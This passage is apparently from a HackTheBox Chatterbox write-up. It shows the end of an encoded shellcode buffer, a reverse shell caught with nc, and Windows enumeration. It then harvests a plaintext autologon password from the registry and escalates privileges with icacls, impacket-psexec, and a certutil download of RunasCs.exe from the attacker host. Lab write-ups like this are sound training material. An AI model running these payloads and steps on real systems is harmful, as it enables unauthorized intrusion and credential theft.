buf += b"\x69\x71\x37\x61\x70\x51\x54\x4b\x61\x49\x6f\x30"
buf += b"\x79\x71\x4a\x33\x64\x4b\x4d\x79\x7a\x78\x59\x53"
buf += b"\x4e\x5a\x51\x39\x42\x6b\x70\x34\x64\x4b\x59\x71"
buf += b"\x4a\x36\x6e\x51\x69\x6f\x44\x6c\x45\x71\x56\x6f"
buf += b"\x5a\x6d\x69\x71\x77\x57\x6d\x68\x59\x50\x31\x65"
buf += b"\x39\x66\x49\x73\x51\x6d\x78\x78\x6f\x4b\x43\x4d"
buf += b"\x6f\x34\x70\x75\x4a\x44\x51\x48\x52\x6b\x30\x58"
buf += b"\x4c\x64\x6b\x51\x6a\x33\x32\x46\x72\x6b\x6a\x6c"
buf += b"\x70\x4b\x54\x4b\x4f\x68\x4d\x4c\x6b\x51\x48\x53"
buf += b"\x64\x4b\x59\x74\x42\x6b\x59\x71\x38\x50\x51\x79"
buf += b"\x71\x34\x6e\x44\x6b\x74\x6f\x6b\x6f\x6b\x53\x31"
buf += b"\x4f\x69\x70\x5a\x70\x51\x69\x6f\x57\x70\x31\x4f"
buf += b"\x4f\x6f\x71\x4a\x74\x4b\x6e\x32\x5a\x4b\x72\x6d"
buf += b"\x6f\x6d\x42\x4a\x4d\x31\x42\x6d\x45\x35\x64\x72"
buf += b"\x4b\x50\x4d\x30\x6d\x30\x52\x30\x62\x48\x4e\x51"
buf += b"\x74\x4b\x30\x6f\x74\x47\x49\x6f\x36\x75\x67\x4b"
buf += b"\x6a\x50\x45\x65\x74\x62\x50\x56\x70\x68\x35\x56"
buf += b"\x34\x55\x45\x6d\x33\x6d\x4b\x4f\x38\x55\x4f\x4c"
buf += b"\x5a\x66\x33\x4c\x59\x7a\x45\x30\x39\x6b\x59\x50"
buf += b"\x32\x55\x6d\x35\x55\x6b\x30\x47\x4b\x63\x61\x62"
buf += b"\x72\x4f\x72\x4a\x39\x70\x52\x33\x6b\x4f\x79\x45"
buf += b"\x54\x30\x50\x6f\x34\x37\x30\x65\x63\x42\x70\x73"
buf += b"\x50\x68\x70\x65\x32\x4c\x62\x4c\x4d\x50\x6c\x6d"
buf += b"\x52\x43\x4f\x30\x43\x39\x53\x35\x63\x48\x6c\x68"
buf += b"\x70\x6e\x32\x45\x71\x67\x4c\x6d\x50\x6f\x33\x32"
buf += b"\x51\x5a\x50\x65\x50\x63\x61\x64\x4d\x50\x72\x4e"
buf += b"\x71\x55\x54\x34\x4c\x6e\x50\x77\x51\x55\x73\x32"
buf += b"\x62\x43\x62\x4c\x62\x49\x4f\x75\x52\x4e\x64\x34"
buf += b"\x6e\x49\x4e\x4e\x72\x44\x42\x4f\x62\x57\x32\x4e"
buf += b"\x72\x4c\x72\x4f\x70\x61\x62\x44\x70\x73\x44\x34"
buf += b"\x74\x32\x52\x49\x32\x4e\x43\x37\x6c\x68\x6c\x67"
buf += b"\x70\x68\x54\x34\x74\x34\x62\x50\x4f\x4a\x4c\x6f"
buf += b"\x6c\x6f\x6c\x71\x6c\x70\x4e\x4e\x30\x31\x6e\x50"
buf += b"\x6e\x4e\x4e\x51\x6d\x66\x4e\x4e\x50\x36\x6c\x6f"
buf += b"\x6f\x59\x42\x4e\x73\x46\x50\x6f\x50\x6b\x50\x65"
buf += b"\x6e\x4d\x32\x30\x50\x6f\x52\x57\x70\x65\x74\x32"
buf += b"\x70\x53\x61\x58\x50\x65\x62\x4c\x30\x6c\x61\x44"
buf += b"\x32\x43\x42\x50\x6c\x6e\x70\x70\x51\x63\x70\x31"
buf += b"\x4b\x77\x6d\x59\x59\x70\x41\x41"
|
Start a python server and then run the rbo.py script,
1
2
3
4
5
6
7
8
| └─# rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.10.74] 49160
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
chatterbox\alfred
|
Privilege Escalation
Enumeration
User group
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| C:\Users\Alfred>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
chatterbox\alfred S-1-5-21-1218242403-4263168573-589647361-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
|
Local users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| C:\Users\Alfred>net user
net user
User accounts for \\CHATTERBOX
-------------------------------------------------------------------------------
Administrator Alfred Guest
The command completed successfully.
C:\Users\Alfred>net user Alfred
net user Alfred
User name Alfred
Full Name
Comment
User's comment
Country code 001 (United States)
Account active Yes
Account expires Never
Password last set 12/10/2017 9:18:08 AM
Password expires Never
Password changeable 12/10/2017 9:18:08 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/10/2025 3:47:12 AM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
|
Systeminfo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
| C:\Users\Alfred>systeminfo
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 1/10/2025, 3:47:03 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,451 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,537 MB
Virtual Memory: In Use: 558 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 183 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2830477
[06]: KB2592687
[07]: KB2479943
[08]: KB2491683
[09]: KB2506212
[10]: KB2506928
[11]: KB2509553
[12]: KB2533552
[13]: KB2534111
[14]: KB2545698
[15]: KB2547666
[16]: KB2552343
[17]: KB2560656
[18]: KB2563227
[19]: KB2564958
[20]: KB2574819
[21]: KB2579686
[22]: KB2604115
[23]: KB2620704
[24]: KB2621440
[25]: KB2631813
[26]: KB2639308
[27]: KB2640148
[28]: KB2647753
[29]: KB2654428
[30]: KB2660075
[31]: KB2667402
[32]: KB2676562
[33]: KB2685811
[34]: KB2685813
[35]: KB2690533
[36]: KB2698365
[37]: KB2705219
[38]: KB2719857
[39]: KB2726535
[40]: KB2727528
[41]: KB2729094
[42]: KB2732059
[43]: KB2732487
[44]: KB2736422
[45]: KB2742599
[46]: KB2750841
[47]: KB2761217
[48]: KB2763523
[49]: KB2770660
[50]: KB2773072
[51]: KB2786081
[52]: KB2799926
[53]: KB2800095
[54]: KB2807986
[55]: KB2808679
[56]: KB2813430
[57]: KB2820331
[58]: KB2834140
[59]: KB2840631
[60]: KB2843630
[61]: KB2847927
[62]: KB2852386
[63]: KB2853952
[64]: KB2857650
[65]: KB2861698
[66]: KB2862152
[67]: KB2862330
[68]: KB2862335
[69]: KB2864202
[70]: KB2868038
[71]: KB2871997
[72]: KB2884256
[73]: KB2891804
[74]: KB2892074
[75]: KB2893294
[76]: KB2893519
[77]: KB2894844
[78]: KB2900986
[79]: KB2908783
[80]: KB2911501
[81]: KB2912390
[82]: KB2918077
[83]: KB2919469
[84]: KB2923545
[85]: KB2931356
[86]: KB2937610
[87]: KB2943357
[88]: KB2952664
[89]: KB2966583
[90]: KB2968294
[91]: KB2970228
[92]: KB2972100
[93]: KB2973112
[94]: KB2973201
[95]: KB2973351
[96]: KB2977292
[97]: KB2978742
[98]: KB2984972
[99]: KB2985461
[100]: KB2991963
[101]: KB2992611
[102]: KB3003743
[103]: KB3004361
[104]: KB3004375
[105]: KB3006121
[106]: KB3006137
[107]: KB3010788
[108]: KB3011780
[109]: KB3013531
[110]: KB3020370
[111]: KB3020388
[112]: KB3021674
[113]: KB3021917
[114]: KB3022777
[115]: KB3023215
[116]: KB3030377
[117]: KB3035126
[118]: KB3037574
[119]: KB3042058
[120]: KB3045685
[121]: KB3046017
[122]: KB3046269
[123]: KB3054476
[124]: KB3055642
[125]: KB3059317
[126]: KB3060716
[127]: KB3061518
[128]: KB3067903
[129]: KB3068708
[130]: KB3071756
[131]: KB3072305
[132]: KB3074543
[133]: KB3075226
[134]: KB3078601
[135]: KB3078667
[136]: KB3080149
[137]: KB3084135
[138]: KB3086255
[139]: KB3092627
[140]: KB3093513
[141]: KB3097989
[142]: KB3101722
[143]: KB3102429
[144]: KB3107998
[145]: KB3108371
[146]: KB3108381
[147]: KB3108664
[148]: KB3109103
[149]: KB3109560
[150]: KB3110329
[151]: KB3118401
[152]: KB3122648
[153]: KB3123479
[154]: KB3126587
[155]: KB3127220
[156]: KB3133977
[157]: KB3137061
[158]: KB3138378
[159]: KB3138612
[160]: KB3138910
[161]: KB3139398
[162]: KB3139914
[163]: KB3140245
[164]: KB3147071
[165]: KB3150220
[166]: KB3150513
[167]: KB3156016
[168]: KB3156019
[169]: KB3159398
[170]: KB3161102
[171]: KB3161949
[172]: KB3161958
[173]: KB3172605
[174]: KB3177467
[175]: KB3179573
[176]: KB3184143
[177]: KB3185319
[178]: KB4014596
[179]: KB4019990
[180]: KB4040980
[181]: KB976902
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
|
Listening ports and established ports
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| C:\Users\Alfred>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 364
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 716
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 856
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 460
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 532
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 468
TCP 10.10.10.74:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.74:9255 0.0.0.0:0 LISTENING 28692
TCP 10.10.10.74:9256 0.0.0.0:0 LISTENING 28692
TCP 10.10.10.74:49158 10.10.16.6:443 ESTABLISHED 28692
TCP [::]:135 [::]:0 LISTENING 664
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 364
TCP [::]:49153 [::]:0 LISTENING 716
TCP [::]:49154 [::]:0 LISTENING 856
TCP [::]:49155 [::]:0 LISTENING 460
TCP [::]:49156 [::]:0 LISTENING 532
TCP [::]:49157 [::]:0 LISTENING 468
UDP 0.0.0.0:123 *:* 832
UDP 0.0.0.0:500 *:* 856
UDP 0.0.0.0:4500 *:* 856
UDP 0.0.0.0:5355 *:* 1116
UDP 0.0.0.0:51748 *:* 1116
UDP 0.0.0.0:57481 *:* 1116
UDP 10.10.10.74:137 *:* 4
UDP 10.10.10.74:138 *:* 4
UDP 10.10.10.74:1900 *:* 3124
UDP 10.10.10.74:9256 *:* 28692
UDP 10.10.10.74:51818 *:* 3124
UDP 127.0.0.1:1900 *:* 3124
UDP 127.0.0.1:51819 *:* 3124
UDP [::]:123 *:* 832
UDP [::]:500 *:* 856
UDP [::]:4500 *:* 856
UDP [::1]:1900 *:* 3124
UDP [::1]:51817 *:* 3124
|
SMB shares
1
2
3
4
5
6
7
8
9
10
| C:\Users\Alfred>net share
net share
Share name Resource Remark
-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
ADMIN$ C:\Windows Remote Admin
The command completed successfully.
|
Windows exploit suggester
Let’s use this tool called wesng,
1
2
3
4
| └─# ./wes.py --update
Windows Exploit Suggester 1.05 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250110
|
Windows exploit suggester output was a LOT and we could come back to it later if we needed to
Unattend.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
| C:\Users\Alfred>type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattend.xml
<?xml version='1.0' encoding='utf-8'?>
<unattend xmlns="urn:schemas-microsoft-com:unattend" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
<settings pass="windowsPE" wasPassProcessed="true">
<component name="Microsoft-Windows-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
<UserData>
<AcceptEula>true</AcceptEula>
<!-- The following section only needed for Vista installs -->
</UserData>
<DiskConfiguration>
<WillShowUI>OnError</WillShowUI>
<Disk>
<DiskID>0</DiskID>
<WillWipeDisk>true</WillWipeDisk>
<CreatePartitions>
<CreatePartition>
<Order>1</Order>
<Type>Primary</Type>
<Extend>true</Extend>
</CreatePartition>
</CreatePartitions>
</Disk>
</DiskConfiguration>
<ComplianceCheck>
<DisplayReport>OnError</DisplayReport>
</ComplianceCheck>
<ImageInstall>
<OSImage>
<InstallFrom>
<MetaData wcm:action="add">
<Key>/IMAGE/NAME</Key>
<Value>Windows 7 PROFESSIONAL</Value>
</MetaData>
</InstallFrom>
<InstallTo>
<DiskID>0</DiskID>
<PartitionID>1</PartitionID>
</InstallTo>
<WillShowUI>OnError</WillShowUI>
<InstallToAvailablePartition>false</InstallToAvailablePartition>
</OSImage>
</ImageInstall>
</component>
<component name="Microsoft-Windows-International-Core-WinPE" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
<InputLocale>en-US</InputLocale>
<SystemLocale>en-US</SystemLocale>
<UILanguage>en-US</UILanguage>
<UserLocale>en-US</UserLocale>
</component>
</settings>
<settings pass="oobeSystem" wasPassProcessed="true">
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
<AutoLogon>
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Enabled>true</Enabled>
<Username>Alfred</Username>
</AutoLogon>
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Alfred</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
<OOBE>
<HideEULAPage>true</HideEULAPage>
<ProtectYourPC>3</ProtectYourPC>
<SkipMachineOOBE>true</SkipMachineOOBE>
<SkipUserOOBE>true</SkipUserOOBE>
<NetworkLocation>Other</NetworkLocation>
</OOBE>
<FirstLogonCommands>
<SynchronousCommand wcm:action="add">
<CommandLine>cmd /c copy a:\upgrader.exe %TEMP%\upgrader.exe</CommandLine>
<Order>1</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>cmd /c copy a:\unattend.cmd %TEMP%\unattend.cmd</CommandLine>
<Order>2</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>cmd /c copy a:\storePwd.exe %TEMP%\storePwd.exe</CommandLine>
<Order>3</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add">
<CommandLine>cmd /c copy a:\storePwd.ini %TEMP%\storePwd.ini</CommandLine>
<Order>4</Order>
</SynchronousCommand>
<SynchronousCommand wcm:action="add"><CommandLine>%TEMP%\unattend.cmd</CommandLine><Order>5</Order></SynchronousCommand><SynchronousCommand wcm:action="add"><CommandLine>powercfg -setactive 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c</CommandLine><Order>6</Order></SynchronousCommand><SynchronousCommand wcm:action="add"><CommandLine>net accounts /MAXPWAGE:UNLIMITED</CommandLine><Order>7</Order></SynchronousCommand><SynchronousCommand wcm:action="add"><CommandLine>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 0 /f</CommandLine><Order>8</Order></SynchronousCommand></FirstLogonCommands>
<TimeZone>Eastern Standard Time</TimeZone>
</component>
</settings>
<settings pass="specialize" wasPassProcessed="true">
<component name="Microsoft-Windows-Security-Licensing-SLC-UX" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
<SkipAutoActivation>true</SkipAutoActivation>
</component>
<component name="Microsoft-Windows-Deployment" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="x86">
<RunSynchronous>
<RunSynchronousCommand wcm:action="add">
<Order>1</Order>
<Path>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\FirstNetwork" /v Category /t REG_DWORD /d 00000000 /f</Path>
</RunSynchronousCommand>
</RunSynchronous>
</component>
</settings>
</unattend>
|
No passwords unattend.xml
Registry keys
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
| PS C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
InfoTip REG_SZ Manages users and passwords for this computer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
(Default) REG_SZ HomeGroup Password
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
(Default) REG_SZ LogonPasswordReset
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
(Default) REG_SZ changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IAS.ChangePassword\CurVer
(Default) REG_SZ IAS.ChangePassword.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
(Default) REG_SZ IHomeGroupPassword
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
(Default) REG_SZ _PasswordDeriveBytes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
(Default) REG_SZ ISupportPasswordMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
FilterIn REG_SZ FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
(Default) REG_SZ PasswordProvider
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
Text REG_SZ Prompt for user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
Text REG_SZ Automatic logon with current user name and password
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{63d2bb1d-e39a-41b8-9a3d-52dd06677588}\ChannelReferences\5
(Default) REG_SZ Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password - PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
(Default) REG_SZ WCN Password PIN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultPassword REG_SZ Welcome1!
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\EH-Tcp
Password REG_SZ
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Policy\Pipeline\23
(Default) REG_SZ IAS.ChangePassword
End of search: 49 match(es) found.
|
There was plaintext password, Welcome1! found on Winlogon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| PS C:\Windows\system32> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
ShutdownWithoutLogon REG_SZ 0
WinStationsDisabled REG_SZ 0
DisableCAD REG_DWORD 0x1
scremoveoption REG_SZ 0
ShutdownFlags REG_DWORD 0x11
DefaultDomainName REG_SZ
DefaultUserName REG_SZ Alfred
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ Welcome1!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
|
It’s of the user Alfred
Multi-way to Admin
icacls
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| PS C:\Users\Administrator> icacls Desktop
Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
CHATTERBOX\Administrator:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CHATTERBOX\Alfred:(I)(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\Administrator> cd Desktop
PS C:\Users\Administrator\Desktop> type root.txt
PS C:\Users\Administrator\Desktop> Get-Content : Access to the path 'C:\Users\Administrator\Desktop\root.txt' is d
enied.
At line:1 char:5
+ type <<<< root.txt
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Deskto
p\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsof
t.PowerShell.Commands.GetContentCommand
|
With icacls we can grant permission to the root.txt file for user Alfred
1
2
3
4
5
| PS C:\Users\Administrator\Desktop> icacls root.txt /grant Alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
PS C:\Users\Administrator\Desktop> type root.txt
3c6cxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
impacket-psexec
Since we have a credential for an account, maybe we could credential stuff for administrator account,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| └─# impacket-psexec administrator@$box
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file lmCiRdld.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service fynJ on 10.10.10.74.....
[*] Starting service fynJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
|
And it works!
RunasCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| PS C:\Users\Administrator\Desktop> certutil -urlcache -f http://10.10.16.6/RunasCs.exe RunasCs.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 1/11/2025 12:33 AM 34 root.txt
-a--- 1/11/2025 2:18 AM 51712 RunasCs.exe
PS C:\Users\Administrator\Desktop> whoami
chatterbox\alfred
PS C:\Users\Administrator\Desktop> ./RunasCs.exe administrator Welcome1! "cmd /c whoami"
chatterbox\administrator
|
Then you can get a reverse shell from this
References
